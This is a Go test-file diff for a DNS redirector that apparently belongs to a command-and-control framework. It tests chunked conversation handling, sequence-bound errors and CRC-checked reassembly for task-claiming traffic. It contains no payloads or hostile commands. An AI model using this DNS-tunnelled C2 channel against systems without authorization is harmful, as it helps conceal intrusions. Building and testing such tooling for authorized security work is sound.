+		ctx := context.Background()
+
+		// Create conversation
+		initPayload := &dnspb.InitPayload{
+			MethodCode:  "/c2.C2/ClaimTasks",
+			TotalChunks: 5,
+			DataCrc32:   0,
+			FileSize:    5,
+		}
+		payloadBytes, err := proto.Marshal(initPayload)
+		require.NoError(t, err)
+
+		initPacket := &dnspb.DNSPacket{
+			Type:           dnspb.PacketType_PACKET_TYPE_INIT,
+			ConversationId: "gaps1234",
+			Data:           payloadBytes,
+		}
+		_, err = r.handleInitPacket(initPacket)
+		require.NoError(t, err)
+
+		// Send chunks 1, 3, 5 (gaps at 2, 4)
+		for _, seq := range []uint32{1, 3, 5} {
+			dataPacket := &dnspb.DNSPacket{
+				Type:           dnspb.PacketType_PACKET_TYPE_DATA,
+				ConversationId: "gaps1234",
+				Sequence:       seq,
+				Data:           []byte{byte(seq)},
+			}
+
+			statusData, err := r.handleDataPacket(ctx, nil, dataPacket, txtRecordType)
+			require.NoError(t, err)
+
+			// Parse STATUS response
+			var statusPacket dnspb.DNSPacket
+			err = proto.Unmarshal(statusData, &statusPacket)
+			require.NoError(t, err)
+
+			// Should always have ACKs for received chunks
+			assert.NotEmpty(t, statusPacket.Acks)
+			// NACKs will appear after gaps - not on first chunk
+		}
+
+		// Verify chunks stored
+		val, ok := r.conversations.Load("gaps1234")
+		require.True(t, ok)
+		conv := val.(*Conversation)
+		assert.Len(t, conv.Chunks, 3)
+		assert.Equal(t, []byte{1}, conv.Chunks[1])
+		assert.Equal(t, []byte{3}, conv.Chunks[3])
+		assert.Equal(t, []byte{5}, conv.Chunks[5])
+		assert.False(t, conv.Completed) // Not all chunks received
+	})
+
+	t.Run("unknown conversation", func(t *testing.T) {
+		r := &Redirector{}
+		ctx := context.Background()
+
+		dataPacket := &dnspb.DNSPacket{
+			Type:           dnspb.PacketType_PACKET_TYPE_DATA,
+			ConversationId: "unknown",
+			Sequence:       1,
+			Data:           []byte{0x01},
+		}
+
+		_, err := r.handleDataPacket(ctx, nil, dataPacket, txtRecordType)
+		assert.Error(t, err)
+		assert.Contains(t, err.Error(), "conversation not found")
+	})
+
+	t.Run("sequence out of bounds", func(t *testing.T) {
+		r := &Redirector{}
+		ctx := context.Background()
+
+		// Create conversation
+		initPayload := &dnspb.InitPayload{
+			MethodCode:  "/c2.C2/ClaimTasks",
+			TotalChunks: 3,
+			DataCrc32:   0,
+		}
+		payloadBytes, err := proto.Marshal(initPayload)
+		require.NoError(t, err)
+
+		initPacket := &dnspb.DNSPacket{
+			Type:           dnspb.PacketType_PACKET_TYPE_INIT,
+			ConversationId: "bounds1234",
+			Data:           payloadBytes,
+		}
+		_, err = r.handleInitPacket(initPacket)
+		require.NoError(t, err)
+
+		// Send chunk with sequence > TotalChunks
+		dataPacket := &dnspb.DNSPacket{
+			Type:           dnspb.PacketType_PACKET_TYPE_DATA,
+			ConversationId: "bounds1234",
+			Sequence:       10,
+			Data:           []byte{0x01},
+		}
+
+		_, err = r.handleDataPacket(ctx, nil, dataPacket, txtRecordType)
+		assert.Error(t, err)
+		assert.Contains(t, err.Error(), "sequence out of bounds")
+	})
+}
+
+// TestProcessCompletedConversation tests data reassembly and CRC validation
+func TestProcessCompletedConversation(t *testing.T) {
+	t.Run("successful reassembly and CRC validation", func(t *testing.T) {
+		data := []byte{0x01, 0x02, 0x03, 0x04, 0x05}
+		expectedCRC := crc32.ChecksumIEEE(data)
+
+		conv := &Conversation{
+			ID:               "complete1234",
+			MethodPath:       "/test/method",
+			TotalChunks:      3,
+			ExpectedCRC:      expectedCRC,
+			ExpectedDataSize: uint32(len(data)),
+			Chunks: map[uint32][]byte{
+				1: {0x01, 0x02},
+				2: {0x03, 0x04},
+				3: {0x05},
+			},
+		}
+
+		// Mock upstream that returns empty response
+		// Since we can't easily mock grpc.ClientConn, we'll test the reassembly logic
+		// by directly checking the data assembly
+
+		// Manually reassemble to test logic
+		var fullData []byte
+		for i := uint32(1); i <= conv.TotalChunks; i++ {
+			chunk, ok := conv.Chunks[i]
+			require.True(t, ok, "missing chunk %d", i)
+			fullData = append(fullData, chunk...)
+		}
+
+		assert.Equal(t, data, fullData)
+		actualCRC := crc32.ChecksumIEEE(fullData)
+		assert.Equal(t, expectedCRC, actualCRC)
+		assert.Equal(t, conv.ExpectedDataSize, uint32(len(fullData)))
+	})
+
+	t.Run("CRC mismatch detection", func(t *testing.T) {
+		data := []byte{0x01, 0x02, 0x03}
+		wrongCRC := uint32(0xDEADBEEF)
+
+		conv := &Conversation{
+			ID:          "crcfail1234",
+			MethodPath:  "/test/method",
+			TotalChunks: 1,
+			ExpectedCRC: wrongCRC,
+			Chunks: map[uint32][]byte{
+				1: data,
+			},
+		}
+
+		// Test CRC validation logic
+		var fullData []byte
+		for i := uint32(1); i <= conv.TotalChunks; i++ {
+			fullData = append(fullData, conv.Chunks[i]...)
+		}
+
+		actualCRC := crc32.ChecksumIEEE(fullData)
+		assert.NotEqual(t, wrongCRC, actualCRC, "CRC should mismatch")
+	})
+}